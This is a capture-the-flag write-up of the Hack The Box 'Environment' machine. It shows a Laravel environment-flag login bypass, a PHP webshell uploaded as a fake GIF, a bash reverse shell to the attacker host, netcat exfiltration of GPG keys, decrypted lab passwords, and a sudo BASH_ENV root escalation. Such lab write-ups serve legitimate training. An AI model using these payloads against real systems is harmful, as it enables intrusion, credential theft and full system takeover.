🧧Environment
https://app.hackthebox.com/machines/Environment
Used htbscan script for Recon and checking result of dir/dns/vhost
Recon
[*] Running initial Nmap scan...
sudo nmap -sCV -T4 10.129.186.191 -oA nmap-initial
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-03 21:27 CEST
Nmap scan report for 10.129.186.191
Host is up (0.027s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
| 256 5c:02:33:95:ef:44:e2:80:cd:3a:96:02:23:f1:92:64 (ECDSA)
|_ 256 1f:3d:c2:19:55:28:a1:77:59:51:48:10:c4:4b:74:ab (ED25519)
80/tcp open http nginx 1.22.1
|_http-title: Did not follow redirect to http://environment.htb
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Website
Login-Page
Our recon script shows us a login page
# Dirsearch started Sat May 3 21:36:59 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://environment.htb:80 -e php,html,txt,js,conf,config,bak -t 50 -o web/port_80/environment.htb/dirsearch_results.txt --quiet
403 555B http://environment.htb/%2e%2e;/test
<snipped>
200 4KB http://environment.htb/index.php
200 2KB http://environment.htb/index.php/login/
User
Laravel
Our feroxbuster-scan shows us a upload page:
Configuration {
kind: "configuration",
wordlist: "/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt",
config: "/etc/feroxbuster/ferox-config.toml",
proxy: "",
replay_proxy: "",
server_certs: [],
client_cert: "",
client_key: "",
target_url: "http://environment.htb:80",
status_codes: [
<snipped>
405 GET 2575l 8675w 244839c http://environment.htb/upload
Laravel Version Identified:
Laravel 11.30.0PHP Version:
8.2.28APP_DEBUG=Truesince we can see the stracktrace
detecting environment=preprod
We can bypass the Login-Page by adding /login?--env=preprod to the url while intercepting the login POST-Request. https://github.com/laravel/framework/security/advisories/GHSA-gv7v-rgg6-548h
POST /login?--env=preprod HTTP/1.1
Host: environment.htb
Content-Length: 98
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://environment.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://environment.htb/login?--env=preprod
Cookie: XSRF-TOKEN=eyJpdiI6IjVJMEtOSWdrelVONzEzNjE5RFpDdkE9PSIsInZhbHVlIjoiblN3R2NYY0pSUVk1V1NHZ3ZRa0lxTXBkZ1dMYWJ6Y1hFUUVGMjJHLzBSRE56ZEVnYjhySGpwNW11ZUZCdmxFZHovY3F6WDA5ckt5bWdsM3lNeEkrVktiVXJGbTEzUUx3ai9KcXNQSGVtL3Rweit0VldmSVhFSUszSjVzYncwWHgiLCJtYWMiOiI4OTI4YjFhYTZhMGQ5ZDg0YzUxMDA5NjNiMDhlNzI4MzVmNjMzNzBmNTNjYWU5NGU1YmQ2NDUyNjc3YzVlZmRkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBQdWR6OG1ZKy9WTVgzYjJyWHVnM2c9PSIsInZhbHVlIjoiMVlFMlNNTDV4ZnVVbnI0SkR6dTNBOUlRSWdiZ0J4cHFjU29rTXgvZ04rVSs3ZElYNU5ma2pUdE50d3lBK1MwS1NJRFEyd2hzZDJjYVZva1hYTTY2S0lNRXlhZW5NQVlMOElFZUlhR1Q5Q0tXK3VWVGlzbWMzNW1wTytHcDYxRC8iLCJtYWMiOiJmMTZmMmVmMmRmMGEzMzYzODY1YjBiYzg1ODY3MjNhNmNmMjVkYzM2NzE1NjQyYmJkZmU3MDdmYTYzNjNmZWUzIiwidGFnIjoiIn0%3D
Connection: keep-alive
<snipped>Reverse-Shell
We are getting redirected to the dashboad:
Now we gonna upload a webshell as userpicture but we need to bypass some detection.
POST /upload HTTP/1.1
Host: environment.htb
Content-Length: 375
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryztxdKMH8xPKzFn4L
Accept: */*
Origin: http://environment.htb
Referer: http://environment.htb/management/profile
Accept-Encoding: gzip, deflate, br
Cookie: XSRF-TOKEN=eyJpdiI6ImtLU1RTL1lOTU9ydEFEY2pVdTNhaGc9PSIsInZhbHVlIjoib3BieVM3YlRjamN3aGhEZm1CL1pMUWh6YXlkdGNISVlXVnlTVGNJdkZaUVJCWDY4aW1ka3RvY3hqWFFHRDBORnluY2hKYy9GNGI5Y05ZaUttQmo2MXNkaEZzOHVGeU1tNzB1ODJ5YU8wOHRDRHBIZkx1MHg4dGMwMWNVZEZVWnMiLCJtYWMiOiI5MGIzYmJmMjAwYjE3ZjAxNDE5MjFlZGU5NThkNGQyYTI5N2U0ZTNiZGRjNjQ3MDI5NmFhZmY0OTliNWY0ZWRlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyUVN1dkEwVlFxMWtTZDFJbTFkYlE9PSIsInZhbHVlIjoiTzdFK1NSbStnamZLUTJIdGNIVWRNQnorV3oxZ28yeXN0LzltY2FUVVA3aUJOVlJuUUNxWGRjTjN5djRxZnB2ajZqWVJrQmQvd3ZDTjFQWlFyNGhEVzFvYVJxMS84RGg0bHZ0T0FuWlVHenBDY09ibCt1dS9jeXp0NkU0UHRlTzYiLCJtYWMiOiIzMjUyYmZlY2ZmZjgzM2FmM2I0YjRkMzlhNzA5NTczNWUxYzcxNjU2OGQxNDUxZmQ1M2FlY2U2ZmEwZjljZTZiIiwidGFnIjoiIn0%3D
Connection: keep-alive
------WebKitFormBoundaryztxdKMH8xPKzFn4L
Content-Disposition: form-data; name="_token"
0izP6cv3a40dMWSXe2S9fFCNdll7KlolLrdzga2E
------WebKitFormBoundaryztxdKMH8xPKzFn4L
Content-Disposition: form-data; name="upload"; filename="simple-backdoor.php."
Content-Type: image/gif
GIF89a;
<?=$_="cmd";@system($_REQUEST[$_]);?>
------WebKitFormBoundaryztxdKMH8xPKzFn4L--
Starting a listener and getting a reverse shell:
➜ rlwrap nc -nlvp 4242 │
listening on [any] 4242 ...
< stuff happen after command below> │
connect to [ip] from (UNKNOWN) [htbip] 55996 │
bash: cannot set terminal process group (930): Inappropriate ioctl for device │
bash: no job control in this shell │
www-data@environment:~/app/storage/app/public/files$ id │
id │
uid=33(www-data) gid=33(www-data) groups=33(www-data) │
www-data@environment:~/app/storage/app/public/files$ http://environment.htb/storage/files/simple-backdoor.php?cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/<yourip>/4242+0%3E%261%27And we get our userflag:
➜ rlwrap nc -nlvp 4242
listening on [any] 4242 ...
connect to [ip] from (UNKNOWN) [htbip] 56386
bash: cannot set terminal process group (964): Inappropriate ioctl for device
bash: no job control in this shell
www-data@environment:~/app/storage/app/public/files$ cd /home
cd /home
www-data@environment:/home$ ls
ls
hish
www-data@environment:/home$ cd hish
cd hish
www-data@environment:/home/hish$ ls
ls
backup
user.txt
www-data@environment:/home/hish$ cat user.txt
cat user.txt
<flag>Root
Continuing in our shell we download the gpg file
www-data@environment:/home/hish$ cd backup
cd backup
www-data@environment:/home/hish/backup$ ls
ls
keyvault.gpg➜ nc -nlvp 4444 > keyvault.gpg
listening on [any] 4444 ...www-data@environment:/home/hish/backup$ nc <yourip> 4444 < keyvault.gpgCtrl-C on Attacker-Side if you think the file has been transfered, it is quite small should only be some seconds.
Same for the keys
nc -lvp 4444 > gnupg.tartar -cvf - /home/hish/.gnupg | nc <your_local_ip> 4444➜ tar -xvf gnupg.tar
home/hish/.gnupg/
home/hish/.gnupg/private-keys-v1.d/
home/hish/.gnupg/private-keys-v1.d/C2DF4CF8B7B94F1EEC662473E275A0E483A95D24.key
home/hish/.gnupg/private-keys-v1.d/3B966A35D4A711F02F64B80E464133B0F0DBCB04.key
home/hish/.gnupg/trustdb.gpg
home/hish/.gnupg/pubring.kbx
home/hish/.gnupg/openpgp-revocs.d/
home/hish/.gnupg/openpgp-revocs.d/F45830DFB638E66CD8B752A012F42AE5117FFD8E.rev
home/hish/.gnupg/pubring.kbx~
home/hish/.gnupg/random_seed ➜ mv ~/.gnupg/ /tmp
➜ mv ./home/hish/.gnupg ~
➜ gpg --decrypt keyvault.gpg
gpg: WARNING: unsafe permissions on homedir '/home/kali/.gnupg'
gpg: encrypted with 2048-bit RSA key, ID B755B0EDD6CFCFD3, created 2025-01-11
"hish_ <hish@environment.htb>"
PAYPAL.COM -> Ihaves0meMon$yhere123
ENVIRONMENT.HTB -> marineSPm@ster!!
FACEBOOK.COM -> summerSunnyB3ACH!!
move you gnupg-folder back afterwards:
➜ rm -rf ~/.gnupg
➜ mv /tmp/.gnupg ~Login in using that credentials
➜ ssh hish@environment.htb
hish@environment.htb's password: marineSPm@ster!!
Linux environment 6.1.0-34-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.135-1 (2025-04-25) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 4 18:07:17 2025 from
Checking what we can do and checking the scripts
hish@environment:~$ sudo -l
Matching Defaults entries for hish on environment:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+="ENV BASH_ENV", use_pty
User hish may run the following commands on environment:
(ALL) /usr/bin/systeminfo
hish@environment:~$ file /usr/bin/systeminfo
/usr/bin/systeminfo: Bourne-Again shell script, ASCII text executable
hish@environment:~$ ls -l /usr/bin/systeminfo
-rwxr-xr-x 1 root root 452 Jan 12 12:11 /usr/bin/systeminfo
hish@environment:~$ head -n 10 /usr/bin/systeminfo
#!/bin/bash
echo -e "\n### Displaying kernel ring buffer logs (dmesg) ###"
dmesg | tail -n 10
echo -e "\n### Checking system-wide open ports ###"
ss -antlp
echo -e "\n### Displaying information about all mounted filesystems ###"
mount | column -tThe script /usr/bin/systeminfo is a bash script run as root, and it uses unsanitized system commands like dmesg, ss, mount, and column.
This means you can do a PATH hijack attack, because sudo will preserve env_keep+="ENV BASH_ENV"
echo 'echo "BASH_ENV sourced as root!"; id; /bin/bash -p' > /tmp/root.sh ; chmod +x /tmp/root.sh ; env -i BASH_ENV=/tmp/root.sh PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin sudo /usr/bin/systeminfo
Hijacking Path with BASH_ENV
Here’s how:
/tmp/root.shHijack: Theecho 'echo "BASH_ENV sourced as root!"; id; /bin/bash -p' > /tmp/root.shcommand creates a new script at/tmp/root.sh. The contents of this file:echo "BASH_ENV sourced as root!" id /bin/bash -p
The first line will print a message indicating that
BASH_ENVhas been sourced.The second line (
id) will show the user ID, which should showrootwhen executed with elevated privileges.The third line (
/bin/bash -p) will start a new interactive root shell with the-pflag, which preserves the environment and avoids resetting some environment variables that may give you additional access.
Exploiting with
env -iandsudo:
The command:
env -i BASH_ENV=/tmp/root.sh PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin sudo /usr/bin/systeminfoenv -iruns a command with a clean environment (i.e., clears all environment variables except those explicitly passed).BASH_ENV=/tmp/root.shsets theBASH_ENVvariable to point to the malicious script/tmp/root.sh.The
PATHvariable is set to the default systemPATH, which is fine for running standard commands, includingsudoand/usr/bin/systeminfo.sudoruns thesysteminfoscript with root privileges, but now theBASH_ENVis set to/tmp/root.sh, so the malicious script is sourced, and the root shell is spawned.
Why This Works
sudodoes not resetBASH_ENV: When you runsudo, it typically does not reset theBASH_ENVvariable unless explicitly configured to do so in the sudoers file. This allows you to control the environment in whichsysteminfois executed, giving you the ability to inject your own commands as root.Bypass Restrictions: The use of
env -ito clear the environment variables except forBASH_ENVandPATHis crucial here. It prevents any other environment variables that might be present from interfering with your exploit.
Last updated